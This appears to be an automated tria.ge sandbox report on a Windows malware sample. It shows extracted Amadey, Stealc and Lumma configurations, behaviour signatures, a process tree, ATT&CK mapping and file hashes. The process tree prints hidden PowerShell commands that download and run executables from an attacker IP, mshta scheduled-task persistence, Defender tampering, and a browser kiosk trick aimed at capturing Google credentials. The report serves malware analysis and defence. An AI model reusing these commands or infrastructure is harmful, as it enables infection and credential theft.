Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
156s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
08/02/2025, 19:06
General
-
Target
random.exe
-
Size
2.1MB
-
MD5
c5ccf77334a5d9892b1797a235e97ae5
-
SHA1
46d8b41e42c60970d61829a4decd62e1f0209e09
-
SHA256
866c5b1e9d1b60bc822741681f6eae8e2361e63d42a17bf44add2229044c52d8
-
SHA512
33644a064a95b6e529203d887418bf19ed47a47b5a80e4f8b18e72f0155aa3c5c5b64c3af3683024d63f2c173a1952262e67ccd605f601858e390b716b0c3311
-
SSDEEP
49152:AA6wXD5xlFVNNllCt4ZSYKW2EDw0Uqt6bL0W5E0c400J:H6wz5xTNllCt4aTSVU4W5E0T
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://paleboreei.biz/api
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
-
Healer
Healer an antivirus disabler dropper.
-
Healer family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
Stealc
Stealc is an infostealer written in C++.
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file 10 IoCs
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 14 IoCs
-
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 28 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 39 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 5 IoCs
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
-
Suspicious use of AdjustPrivilegeToken 14 IoCs
-
Suspicious use of FindShellTrayWindow 24 IoCs
-
Suspicious use of SendNotifyMessage 22 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1071503101\caa67bbf6e.exe"C:\Users\Admin\AppData\Local\Temp\1071503101\caa67bbf6e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 6lTgrmaUvrb /tr "mshta C:\Users\Admin\AppData\Local\Temp\5NPwDQbL9.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 6lTgrmaUvrb /tr "mshta C:\Users\Admin\AppData\Local\Temp\5NPwDQbL9.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\5NPwDQbL9.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XCTHDR74ZHTDXPWQ9STVNR9TX7WQDDGW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempXCTHDR74ZHTDXPWQ9STVNR9TX7WQDDGW.EXE"C:\Users\Admin\AppData\Local\TempXCTHDR74ZHTDXPWQ9STVNR9TX7WQDDGW.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1071504021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1071504021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "So0wMmaQP1V" /tr "mshta \"C:\Temp\ZURKSsuJX.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ZURKSsuJX.hta"5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071530001\750d03e305.exe"C:\Users\Admin\AppData\Local\Temp\1071530001\750d03e305.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1071531001\6a65dcf8ec.exe"C:\Users\Admin\AppData\Local\Temp\1071531001\6a65dcf8ec.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\1071531001\6a65dcf8ec.exe"C:\Users\Admin\AppData\Local\Temp\1071531001\6a65dcf8ec.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 5164⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071532001\5d0c90af90.exe"C:\Users\Admin\AppData\Local\Temp\1071532001\5d0c90af90.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\088HUOUR6K6AJON93RVVH187V.exe"C:\Users\Admin\AppData\Local\Temp\088HUOUR6K6AJON93RVVH187V.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1OVI23GLEX9N7T5C1NA8XPTJ7CLO.exe"C:\Users\Admin\AppData\Local\Temp\1OVI23GLEX9N7T5C1NA8XPTJ7CLO.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071533001\e98dec05ad.exe"C:\Users\Admin\AppData\Local\Temp\1071533001\e98dec05ad.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\1071534001\b5c99daf6f.exe"C:\Users\Admin\AppData\Local\Temp\1071534001\b5c99daf6f.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.0.188642450\332185171" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1240 -prefsLen 20769 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14b5e6cd-98f3-427e-87f3-caf0881eecbd} 600 "\\.\pipe\gecko-crash-server-pipe.600" 1312 11df5758 gpu6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.1.2109284136\1814727062" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21630 -prefMapSize 233414 -appDir "C:\Program Files\Mozilla Firefox\browser" - {04d726a2-1d19-48c3-8363-fb3fbd8db814} 600 "\\.\pipe\gecko-crash-server-pipe.600" 1528 e72a58 socket6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.2.570229667\2000553752" -childID 1 -isForBrowser -prefsHandle 2128 -prefMapHandle 2124 -prefsLen 21733 -prefMapSize 233414 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7002b459-4cc3-4b31-bea6-3a4b5304c653} 600 "\\.\pipe\gecko-crash-server-pipe.600" 2140 19ed3358 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.3.1444492619\412216702" -childID 2 -isForBrowser -prefsHandle 2856 -prefMapHandle 2852 -prefsLen 26138 -prefMapSize 233414 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {20a7876b-e0d8-4e26-899e-2b3dc5d6b43c} 600 "\\.\pipe\gecko-crash-server-pipe.600" 2868 e64858 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.4.1203908681\119039287" -childID 3 -isForBrowser -prefsHandle 3688 -prefMapHandle 3684 -prefsLen 26197 -prefMapSize 233414 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b7c5ee4-e00c-4f02-9594-a38983a839f0} 600 "\\.\pipe\gecko-crash-server-pipe.600" 3700 1d34d858 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.5.1842560768\1551605773" -childID 4 -isForBrowser -prefsHandle 3840 -prefMapHandle 3816 -prefsLen 26197 -prefMapSize 233414 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f420957a-534e-449b-ad4e-cb49685fbf29} 600 "\\.\pipe\gecko-crash-server-pipe.600" 3836 1e2e6958 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="600.6.1328623669\1477748887" -childID 5 -isForBrowser -prefsHandle 4016 -prefMapHandle 4020 -prefsLen 26197 -prefMapSize 233414 -jsInitHandle 880 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4685824-6e31-4452-8121-f6655d66464a} 600 "\\.\pipe\gecko-crash-server-pipe.600" 4004 1f10ee58 tab6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1071535001\068db76f25.exe"C:\Users\Admin\AppData\Local\Temp\1071535001\068db76f25.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn S53YdmaUv0x /tr "mshta C:\Users\Admin\AppData\Local\Temp\vuT5lHycS.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn S53YdmaUv0x /tr "mshta C:\Users\Admin\AppData\Local\Temp\vuT5lHycS.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\vuT5lHycS.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XVM9XKVHBZD1DP5TPTW6RXXDWQTUSG8M.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempXVM9XKVHBZD1DP5TPTW6RXXDWQTUSG8M.EXE"C:\Users\Admin\AppData\Local\TempXVM9XKVHBZD1DP5TPTW6RXXDWQTUSG8M.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
7Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
29KB
MD596a5edb43a417a66e06c2bc6b595db8c
SHA15ab6bb685f93c591d82a3d62b4798559e54d30bf
SHA256b69e0ab1ea2ef70d907fbb09833c0619934349f550178b0b23c11465784b9fe9
SHA512e8669c6e4a432b31a868bb37233dfe8f9c2a8818694459624de93d8963193f392465849a1717387c1df68e8db08e537bfe70cbe278a2e2b6af0da706ece0b026
-
Filesize
15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
938KB
MD5449ecf36234c04c28ab61f71f84d6d6c
SHA1264d13d052df9b83c14046704f884c8d2e612175
SHA256ec18752527f1bd94903ea9277d5dc3007fc2bd1a25d57b03d3420fd8595ab644
SHA5120c82ce48f7431b66058c81102be0fea5cb961cc0f912805d0aee6e22594d196f65a45a216d2c7fc71a726f5751ebc216672672deb23714a6f3a1748497a0f48f
-
Filesize
2KB
MD5189e4eefd73896e80f64b8ef8f73fef0
SHA1efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74
-
Filesize
1.7MB
MD5a5a0fb164c745f34b693efb94aeeef05
SHA1e1f1605a369272447d5fe08490180762b7c5988e
SHA256cf1fbc845b7a422598a80543273b94c5b341d9e1fe4a3e2f689250ba67f07ccc
SHA512e93274c6f079613859ae84ea36fc5206ac58d24a695adbd4fda2d3ca5f281b6f80793c80797bbacb150f04e48970fe31772b7f31cdbe91f0210891dc6d91de03
-
Filesize
728KB
MD5911e84caf2003fa338e75c94c0a13fa4
SHA1f8a7dfb45c7e1c0561e03e68d36978ac64e99a70
SHA256f79d90d5342f51c84ce5700a388c04b7ca08ece2e05b079cb4641d45f6594e2b
SHA512b07a561866b1b16ee21069c594175e8049522d01a0779423dc451b28ef2459d33cc468d9944528cb89f4e7a008239ae5ed6adc76aaa3c2f73463c42df87b25c1
-
Filesize
1.8MB
MD5ebb19356f4a1f8d9aa63efcad72818a6
SHA1005666bf6270b976c4e2c2faf13491da29389c7e
SHA2568313c081a92b8c3e8debe8b6662ce1531cbf3d0e6464c1a6d0ee178568a52c40
SHA512f4821767f3056ad7c2a58de117667b28a1a2e619d495cf3238a7f36aedc8bb0b4add7affd0cc0ae9020991f28c6f67b4dee1d937920eff99e9789ea1b0a95ec8
-
Filesize
1.7MB
MD59029a85b5ffa5bd915cd2a463bcda9a4
SHA1adab3a0f4d43b646e6361553f13d35e434a12cf2
SHA25668eeb68d21179446664122d2c8cc1ff9266a8643d4721a40a83c029f1d70c8e6
SHA512c98cc795d29a937b16eee3620373bf3fb54c32fb36db510df813f3760816785b696fb08c88cd4e8ffb457872fbede9b01b2c2d7944f993d2607407bb637e0fe9
-
Filesize
946KB
MD54cb7f8d6d02d0a8b31c24b632532f3b5
SHA1d94a1c2c7f1ee270ba2854cddcf4da106023ec67
SHA256c56deb44762dfe55715e5b2dcdd26c83ace4db66b0d6ea9b3dfb161013b6be4e
SHA512b82a1d703302883c109d8cca7e301fd1917d208df263adb1390e274cc7779615cbdd3bd26ea7f5c0afb40d9113df129566dfae357b393872e2132e0a51428a8d
-
Filesize
938KB
MD55f5311db746cf4e37cbce62174620467
SHA1046464dd8858bafee645c26c225abc209379199d
SHA25635fbdd95d2951a99c5420f110a434bebb19ee51ddd040c28c45f9cb71d5ca9b9
SHA512c8b948e9dc298240b86511ee73684496b8da66fb41bae82af5a27789348155e410d27cac594bd75a65ffc312a87d8629ff78b8125a39a7cb55e90b6a8b5f0acc
-
Filesize
726B
MD57be5583d812f7ef70e9a1abf57b64149
SHA1ad9bedb151faa1dc25f62d691b09effb33cfec77
SHA256f12b4017868ebc00565982ea3626124fc705fa89694c2b4ea001b58500086336
SHA5125aa5f4e47ac9adcffa8ffe7c42486a9de7eb7f7976068ada0d8b71106186d28926ba84f100d12ce536ebdb7f39f5a98f86565e8ff3409394728bdfebed2c19fb
-
Filesize
2.1MB
MD5c5ccf77334a5d9892b1797a235e97ae5
SHA146d8b41e42c60970d61829a4decd62e1f0209e09
SHA256866c5b1e9d1b60bc822741681f6eae8e2361e63d42a17bf44add2229044c52d8
SHA51233644a064a95b6e529203d887418bf19ed47a47b5a80e4f8b18e72f0155aa3c5c5b64c3af3683024d63f2c173a1952262e67ccd605f601858e390b716b0c3311
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
720B
MD5af637d280691af3e3cea9034b16bad6f
SHA1ecc6a89e521107ade4160a5e53537748aa73c506
SHA256a1417437bccb02dcf3ecac77c59ba9324c6439f0b1552a6919412a3eca5c1ba4
SHA512b973ab703d75077cfbcf6d9091c8fb91d3effbd60f3c2c26cc5485023891373a1bf418bf07eaa08e6585ab93653eaf99ce699cfbb2615f2e97428a2c7627d460
-
Filesize
7KB
MD5b7551f572d0a32ff1cb0f736ddc34d4f
SHA1532c730f0f72c1b94db3c92ef17ac29312659c1f
SHA2566152d042bb3fb8c80363188bb74c68262e866e0007e465738b633e7c550a2eaf
SHA51271ddf0206669c110a71ed6407a80ef1afef91e585dbb25b148e6e75f0a69a1e9ee73e580a160d2cf90005a153e480391fb0af1a210dd980ed7a3b0cea957e6f1
-
Filesize
2KB
MD5a4bfceebac31456028db13b3461cda3e
SHA182974c4176bf6d31a7d808a21b34849e1882f731
SHA25680c121de124448b1b104545de9e2c641af5d1aeee39c30d72158ce3e379b78c4
